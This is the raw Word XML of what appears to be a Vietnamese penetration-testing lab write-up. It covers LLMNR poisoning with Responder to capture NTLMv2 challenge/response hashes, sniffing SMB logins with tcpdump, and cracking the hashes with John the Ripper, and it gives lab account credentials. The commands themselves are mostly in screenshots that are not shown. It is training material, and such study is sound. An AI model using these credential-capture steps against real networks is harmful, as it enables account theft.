          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="572552F4" wp14:editId="4DEC4916">
            <wp:extent cx="5248275" cy="4495800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="89097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1398" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId106"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5248275" cy="4495800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D71934B" w14:textId="599E31BF" w:rsidR="00BE77C0" w:rsidRDefault="00BE77C0" w:rsidP="00BE77C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24E761A7" wp14:editId="2595FF7E">
            <wp:extent cx="6858000" cy="2159635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4024205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0532" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId107"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2159635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739FAFA" w14:textId="3A3E7016" w:rsidR="00BE77C0" w:rsidRDefault="00BE77C0" w:rsidP="00BE77C0">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Chuyển qua máy windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291435F0" w14:textId="77777777" w:rsidR="00BE77C0" w:rsidRDefault="00BE77C0" w:rsidP="00BE77C0">
      <w:r>
        <w:t>Đăng nhập bằng tài khoản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D0A14A" w14:textId="77777777" w:rsidR="00BE77C0" w:rsidRDefault="00BE77C0" w:rsidP="00BE77C0">
      <w:r>
        <w:t>clark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901C0C4" w14:textId="04F9F22F" w:rsidR="00BE77C0" w:rsidRDefault="00BE77C0" w:rsidP="00BE77C0">
      <w:r>
        <w:t xml:space="preserve">Qwerty12 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F70639D" w14:textId="2311F660" w:rsidR="00BE77C0" w:rsidRDefault="00BE77C0" w:rsidP="00BE77C0">
      <w:r>
        <w:t>*Sẽ bị yêu cầu đổi mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F613678" w14:textId="2D5970A8" w:rsidR="00BE77C0" w:rsidRDefault="00BE77C0" w:rsidP="00BE77C0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="700E7380" wp14:editId="40C02C19">
            <wp:extent cx="3109807" cy="3952875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="163494672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6728" name="Picture 1" descr="A screenshot of a login screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId108"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3119347" cy="3965001"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0846E779" wp14:editId="1014BB5E">
            <wp:extent cx="3388955" cy="3943350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="233742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224" name="Picture 1" descr="A screenshot of a login screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3400933" cy="3957288"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00BE77C0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14DB3926" wp14:editId="181FF9C9">
            <wp:extent cx="3484880" cy="5086350"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="113072831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8311" name="Picture 1" descr="A screenshot of a login screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId110"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3491000" cy="5095282"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5331C139" w14:textId="6027F81B" w:rsidR="00BE77C0" w:rsidRDefault="006D4925" w:rsidP="006D4925">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Mở Explorer window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE856A2" w14:textId="400253C6" w:rsidR="006D4925" w:rsidRDefault="006D4925" w:rsidP="006D4925">
      <w:r>
        <w:t>Mở explorer window và thử mở một kết nối SMB đến một hệ thống không tồn tại. Việc này sẽ kích hoạt yêu cầu LLMNR, máy Windows sẽ cố gắng giải quyết hostname sử dụng request LLMNR đa hướng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766A3D81" w14:textId="1324A1FF" w:rsidR="006D4925" w:rsidRDefault="006D4925" w:rsidP="006D4925">
      <w:r>
        <w:t xml:space="preserve">Nhập </w:t>
      </w:r>
      <w:hyperlink r:id="rId111" w:history="1">
        <w:r w:rsidRPr="00E22AE9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\WINDOWS01</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> vào thanh địa chỉ và nhấn enter, chờ một lúc kết quả sẽ trả về là access denied và yêu cầu thông tin xác thực</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5A56AD" w14:textId="013431E9" w:rsidR="006D4925" w:rsidRDefault="006D4925" w:rsidP="006D4925">
      <w:r>
        <w:t>Quan trọng là tại thời điểm này máy window đã cố logout tài khoản mà ta hiện đang đăng nhập. Responder đã có thể nhận được NTLMv2 challenge/response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC2D47D" w14:textId="380BF0D1" w:rsidR="006D4925" w:rsidRDefault="006D4925" w:rsidP="006D4925">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D2266C8" wp14:editId="6BCDCCDD">
            <wp:extent cx="4343400" cy="3752850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10775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4540" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4343400" cy="3752850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEB04F5" w14:textId="0BEEBBC7" w:rsidR="006D4925" w:rsidRDefault="006D4925" w:rsidP="006D4925">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Kiểm tra NTLMv2 challenge/response hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B173B0B" w14:textId="28C8B3CD" w:rsidR="006D4925" w:rsidRDefault="006D4925" w:rsidP="006D4925">
      <w:r>
        <w:t>Chuyển lại sang máy linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF381AF" w14:textId="6FFC2FFB" w:rsidR="006D4925" w:rsidRDefault="00BD79F9" w:rsidP="006D4925">
      <w:r>
        <w:t xml:space="preserve">Ta có thể thấy một NTLMv2 challenge/response đã được chụp lại. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6B03C9" w14:textId="23E971C0" w:rsidR="006D4925" w:rsidRDefault="00BD79F9" w:rsidP="006D4925">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DBD8733" wp14:editId="430B32DD">
            <wp:extent cx="6858000" cy="2156460"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1749337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7588" name="Picture 1" descr="A screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId113"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2156460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A82A0E" w14:textId="59B9392F" w:rsidR="00BD79F9" w:rsidRDefault="00BD79F9" w:rsidP="006D4925">
      <w:r>
        <w:t>Khi ta đã lấy được hash, thoát Responder bằng cách nhấn ctrl c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575745B3" w14:textId="340F6955" w:rsidR="00BD79F9" w:rsidRDefault="00BD79F9" w:rsidP="006D4925">
      <w:r>
        <w:t xml:space="preserve">Ta có thể thấy Responder đã poison phản hồi cho windows01.local và windows01 và lấy được hash. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F46C67" w14:textId="3738C17A" w:rsidR="00BD79F9" w:rsidRDefault="00BD79F9" w:rsidP="00BD79F9">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Sử dụng John the Ripper để crack hash đã thu được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B50505" w14:textId="3D06DA59" w:rsidR="00BD79F9" w:rsidRDefault="00BD79F9" w:rsidP="00BD79F9">
      <w:r>
        <w:t>Sự khác nhau giữa NTLM và NTLMv2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770CB804" w14:textId="2762C9D7" w:rsidR="00BD79F9" w:rsidRDefault="00BD79F9" w:rsidP="00BD79F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NTLM hash là MD4 hash không có salt, được Window sử dụng trong file SAM (local user) hoặc trong file NTDS.dit (domain user). Loại hash này có thể bị tấn công bởi tấn công pass-the-hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA0B85E" w14:textId="2157338B" w:rsidR="00BD79F9" w:rsidRDefault="00BD79F9" w:rsidP="00BD79F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD79F9">
        <w:t>NetNTLMv2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD79F9">
        <w:t xml:space="preserve"> là một </w:t>
      </w:r>
      <w:r>
        <w:t>response/challenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD79F9">
        <w:t xml:space="preserve"> có thể được sử dụng để khởi động một cuộc tấn công </w:t>
      </w:r>
      <w:r>
        <w:t>brute force</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD79F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>offline</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD79F9">
        <w:t>. Loại băm này không thể được sử dụng trong một cuộc tấn công Pass-the-Hash, nhưng có khả năng có thể được chuyển tiếp trong một cuộc tấn công SMB Relay!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85013E" w14:textId="73B29809" w:rsidR="00BD79F9" w:rsidRDefault="00BD79F9" w:rsidP="00BD79F9">
      <w:r>
        <w:t>Bản hash thu được trước đó được lưu mặc định trong file /opt/responder/logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E79BB" w14:textId="1EE0CB56" w:rsidR="005248BF" w:rsidRDefault="00BD79F9" w:rsidP="00BD79F9">
      <w:r>
        <w:t>Dùng John để crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6883AC1C" w14:textId="275CE0E3" w:rsidR="005248BF" w:rsidRDefault="005248BF" w:rsidP="00BD79F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="312C3444" wp14:editId="76FE0428">
            <wp:extent cx="6858000" cy="4432935"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="72268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8535" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId114"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="4432935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E67687" w14:textId="6EB3618D" w:rsidR="005248BF" w:rsidRDefault="005248BF" w:rsidP="005248BF">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Đăng xuất và đăng nhập lại bằng tài khoản sec560 trên windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE8F86A" w14:textId="70C30124" w:rsidR="005248BF" w:rsidRDefault="005248BF" w:rsidP="005248BF">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Capture hash với sniffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F78C02" w14:textId="507E01DD" w:rsidR="005248BF" w:rsidRDefault="007256B5" w:rsidP="005248BF">
      <w:r>
        <w:t>Chúng ta sẽ chạy tcpdump và đăng nhập không thành công máy window thôngg qua SMB sử dụng smbclient. Từ đí ta sẽ đánh hơi được quá trình trao đổi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0974B1" w14:textId="2CA49936" w:rsidR="007256B5" w:rsidRDefault="007256B5" w:rsidP="005248BF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41967EF7" wp14:editId="64002F66">
            <wp:extent cx="6858000" cy="875665"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="111171231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2318" name="Picture 1" descr="A computer screen shot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="875665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA1FEFB" w14:textId="77777777" w:rsidR="007256B5" w:rsidRDefault="007256B5" w:rsidP="005248BF">
      <w:r w:rsidRPr="007256B5">
        <w:t xml:space="preserve">-n: hiển thị địa chỉ IP thay vì tên máy chủ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D379CA4" w14:textId="12C74C87" w:rsidR="007256B5" w:rsidRDefault="007256B5" w:rsidP="005248BF">
      <w:r>
        <w:t>-v giúp in ra bao nhiêu packet đã được nhận</w:t>
      </w:r>
      <w:r w:rsidRPr="007256B5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668588E4" w14:textId="77777777" w:rsidR="007256B5" w:rsidRDefault="007256B5" w:rsidP="005248BF">
      <w:r w:rsidRPr="007256B5">
        <w:t xml:space="preserve">-w /tmp/winauth.pcap: Cờ để ghi lại các gói tin đã bắt được vào một tập tin có tên winauth.pcap, và đường dẫn của tập tin là /tmp/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AACF3F4" w14:textId="79810ABA" w:rsidR="007256B5" w:rsidRDefault="007256B5" w:rsidP="005248BF">
      <w:r w:rsidRPr="007256B5">
        <w:t>port 445: Lọc các gói tin mà có cổng nguồn hoặc đích là cổng 445, điều này giúp chỉ ghi lại các gói tin liên quan đến dịch vụ SMB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0257AAB1" w14:textId="67DFC1D7" w:rsidR="007256B5" w:rsidRDefault="007256B5" w:rsidP="005248BF">
      <w:r>
        <w:t>Để giả lập xác thực, ta mở terminal mới và nhập lệnh sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C023769" w14:textId="3EAC4B29" w:rsidR="007256B5" w:rsidRDefault="007256B5" w:rsidP="005248BF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72CC2BF9" wp14:editId="68BC66CC">
            <wp:extent cx="6858000" cy="2804160"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1398357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7591" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId116"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2804160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E37B5B7" w14:textId="3EEEFD93" w:rsidR="007256B5" w:rsidRDefault="007256B5" w:rsidP="005248BF">
      <w:r>
        <w:t>Ở cửa sổ tcpdump nhấn ctrl c để thoát.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E8DA72" w14:textId="64DD7285" w:rsidR="007256B5" w:rsidRDefault="007256B5" w:rsidP="007256B5">
      <w:pPr>
        <w:pStyle w:val="Style3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Trích xuất hash từ file pcap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D87EFA" w14:textId="6B1DFB10" w:rsidR="007256B5" w:rsidRDefault="00EF1377" w:rsidP="007256B5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78358ABF" wp14:editId="1A60F577">
            <wp:extent cx="6858000" cy="4475480"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="182253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8283" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="4475480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14428CFD" w14:textId="1A463807" w:rsidR="00EF1377" w:rsidRDefault="00EF1377" w:rsidP="007256B5">
      <w:r>
        <w:t>Tool cũng đã tạo file logs chứa các thông tin đầu ra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC3D571" w14:textId="6368C7D6" w:rsidR="00EF1377" w:rsidRDefault="00EF1377" w:rsidP="007256B5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45C75740" wp14:editId="4D1FA3D2">
            <wp:extent cx="6858000" cy="2054860"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="14544894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89436" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2054860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1770E70A" w14:textId="5751C270" w:rsidR="00EF1377" w:rsidRDefault="00EF1377" w:rsidP="007256B5">
      <w:r>
        <w:t>Dùng John crack hash này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04989601" w14:textId="4EF4DC77" w:rsidR="00EF1377" w:rsidRDefault="00EF1377" w:rsidP="007256B5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22BAA9E8" wp14:editId="7A3975C0">
            <wp:extent cx="6858000" cy="2242185"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="17020326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2620" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId119"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="2242185"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D7DEDF" w14:textId="0EE44F5B" w:rsidR="00EF1377" w:rsidRDefault="00EF1377" w:rsidP="007256B5">
      <w:r>
        <w:t>Tương tự có thể dùng hashcat để crack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF753D7" w14:textId="77777777" w:rsidR="00EF1377" w:rsidRPr="00690E47" w:rsidRDefault="00EF1377" w:rsidP="007256B5"/>
    <w:sectPr w:rsidR="00EF1377" w:rsidRPr="00690E47" w:rsidSect="004823D3">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3DD3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D256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5FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="976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581D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7D8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6C07"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4F6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4881"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99026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D6B3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A2C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45F91"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="61F4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359DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="948C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E401D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C9A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D7FFD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7D0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A188A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EBA47918"/>
    <w:lvl w:ilvl="0" w:tplc="FF76F938">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D34B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BB0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B1DA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A34E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725AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C78854FE"/>
    <w:lvl w:ilvl="0" w:tplc="ADB8D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915FF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="62C0E0F0"/>
    <w:lvl w:ilvl="0" w:tplc="7806E5E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2560">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="454176633">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="324868198">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="430471497">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1482692160">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="910503574">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1917586231">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1021785927">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="124852092">
    <w:abstractNumId w:val="10"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1643655636">
